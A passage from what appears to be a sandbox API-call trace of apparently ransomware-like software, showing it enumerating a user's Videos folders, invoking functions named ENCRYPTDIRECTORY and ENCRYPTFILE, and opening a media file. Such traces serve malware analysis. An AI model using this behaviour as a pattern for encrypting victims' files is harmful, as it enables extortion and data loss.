ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c356c, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﱰмńဓ+\x10")) returned 0 [0101.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0101.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0101.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0101.046] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0101.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|jyNO5NcyIG2nrd|pNrmbcA|tr4gQM", cchCount1=30, lpString2="", cchCount2=0) returned 3 [0101.046] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0101.046] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0101.046] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd")) returned 0x10 [0101.046] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83ec870, ftCreationTime.dwHighDateTime=0x1d5efe1, ftLastAccessTime.dwLowDateTime=0x8ae48190, ftLastAccessTime.dwHighDateTime=0x1d5ee3b, ftLastWriteTime.dwLowDateTime=0x8ae48190, ftLastWriteTime.dwHighDateTime=0x1d5ee3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca598, cFileName=".", cAlternateFileName="")) returned 0x41ac700 [0101.046] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83ec870, ftCreationTime.dwHighDateTime=0x1d5efe1, ftLastAccessTime.dwLowDateTime=0x8ae48190, ftLastAccessTime.dwHighDateTime=0x1d5ee3b, ftLastWriteTime.dwLowDateTime=0x8ae48190, ftLastWriteTime.dwHighDateTime=0x1d5ee3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca598, cFileName="..", cAlternateFileName="")) returned 1 [0101.046] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc2f0d90, ftCreationTime.dwHighDateTime=0x1d5f0ac, ftLastAccessTime.dwLowDateTime=0x588a2820, ftLastAccessTime.dwHighDateTime=0x1d5e455, ftLastWriteTime.dwLowDateTime=0x588a2820, ftLastWriteTime.dwHighDateTime=0x1d5e455, nFileSizeHigh=0x0, nFileSizeLow=0x18727, dwReserved0=0x0, dwReserved1=0x43ca598, cFileName="3lc9YJH.swf", cAlternateFileName="")) returned 1 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0101.047] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c544b70, ftCreationTime.dwHighDateTime=0x1d5efa5, ftLastAccessTime.dwLowDateTime=0xf9905a0, ftLastAccessTime.dwHighDateTime=0x1d5ec16, ftLastWriteTime.dwLowDateTime=0xf9905a0, ftLastWriteTime.dwHighDateTime=0x1d5ec16, nFileSizeHigh=0x0, nFileSizeLow=0x8e18, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="GPtGPTImgDjIi0576udd.swf", cAlternateFileName="GPTGPT~1.SWF")) returned 1 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0101.047] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeecd3cc0, ftCreationTime.dwHighDateTime=0x1d5e0e8, ftLastAccessTime.dwLowDateTime=0x2e368a50, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0x2e368a50, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x15742, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="h8KMQ6UP_q4ir-v.mp4", cAlternateFileName="H8KMQ6~1.MP4")) returned 1 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0101.047] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c81d70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2eec7760, ftLastAccessTime.dwHighDateTime=0x1d5ebb3, ftLastWriteTime.dwLowDateTime=0x2eec7760, ftLastWriteTime.dwHighDateTime=0x1d5ebb3, nFileSizeHigh=0x0, nFileSizeLow=0xb6e8, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="IQ0I29Q qVTPWYuVmY.avi", cAlternateFileName="IQ0I29~1.AVI")) returned 1 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0101.047] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55e2cc60, ftCreationTime.dwHighDateTime=0x1d5e114, ftLastAccessTime.dwLowDateTime=0x5ea9f620, ftLastAccessTime.dwHighDateTime=0x1d5e493, ftLastWriteTime.dwLowDateTime=0x5ea9f620, ftLastWriteTime.dwHighDateTime=0x1d5e493, nFileSizeHigh=0x0, nFileSizeLow=0x5fd0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="s4MXeg0Vr.avi", cAlternateFileName="S4MXEG~1.AVI")) returned 1 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0101.047] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2281a0f0, ftCreationTime.dwHighDateTime=0x1d5e63a, ftLastAccessTime.dwLowDateTime=0x46c92e10, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x46c92e10, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0xc29d, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="yxs3r3.mp4", cAlternateFileName="")) returned 1 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0101.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0101.047] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2810, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0xb, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3570, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﶰмńဓ+\x10")) returned 0 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0101.048] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0101.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|3lc9YJH.swf|GPtGPTImgDjIi0576udd.swf|h8KMQ6UP_q4ir-v.mp4|IQ0I29Q qVTPWYuVmY.avi|s4MXeg0Vr.avi|yxs3r3.mp4", cchCount1=105, lpString2="", cchCount2=0) returned 3 [0101.048] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0101.048] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc2f0d90, ftCreationTime.dwHighDateTime=0x1d5f0ac, ftLastAccessTime.dwLowDateTime=0x588a2820, ftLastAccessTime.dwHighDateTime=0x1d5e455, ftLastWriteTime.dwLowDateTime=0x588a2820, ftLastWriteTime.dwHighDateTime=0x1d5e455, nFileSizeHigh=0x0, nFileSizeLow=0x18727, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="3lc9YJH.swf", cAlternateFileName="")) returned 0x41ac2c0 [0101.048] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0101.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0101.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0101.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0101.048] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0101.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0101.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0101.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0101.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0101.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0101.049] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0101.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0101.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0101.049] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0101.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0101.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0101.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0101.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.051] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.052] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0101.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cab08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0101.052] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0101.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0101.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0101.054] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\3lc9YJH.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\3lc9yjh.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 